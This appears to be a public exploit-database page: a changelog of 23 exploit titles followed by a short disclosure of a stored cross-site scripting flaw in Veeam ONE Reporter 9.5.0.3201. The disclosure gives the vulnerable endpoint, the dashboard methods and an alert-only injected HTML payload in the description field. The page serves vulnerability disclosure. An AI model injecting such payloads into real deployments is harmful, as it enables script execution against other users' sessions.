
23 changes to exploits/shellcodes SpotAuditor 3.6.7 - Denial of Service (PoC) SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC) SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC) Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter) DeviceViewer 3.12.0.1 - 'user' SEH Overflow Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit) AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit) Pimcore < 5.71 - Unserialize RCE (Metasploit) Netgear DGN2200 / DGND3700 - Admin Password Disclosure Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget) Intelbras IWR 3000N - Denial of Service (Remote Reboot) Joomla! Component ARI Quiz 3.7.4 - SQL Injection Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery HumHub 1.3.12 - Cross-Site Scripting Spring Cloud Config 2.1.x - Path Traversal (Metasploit) Domoticz 4.10577 - Unauthenticated Remote Command Execution Joomla! Component JiFile 2.3.1 - Arbitrary File Download Hyvikk Fleet Manager - Shell Upload Agent Tesla Botnet - Information Disclosure Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
18 lines
No EOL
565 B
Text
18 lines
No EOL
565 B
Text
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
|
|
# Exploit Author: Seyed Sadegh Khatami
|
|
# Website: https://www.cert.ir
|
|
# Date: 2019-04-27
|
|
# Google Dork: N/A
|
|
# Vendor Homepage: https://www.veeam.com/
|
|
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
|
|
# Version: 9.5.0.3201
|
|
# Tested on: Windows Server 2016
|
|
|
|
|
|
#exploit:
|
|
|
|
Path: /CommonDataHandlerReadOnly.ashx
|
|
|
|
method: addDashboard / editDashboard
|
|
|
|
SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>” |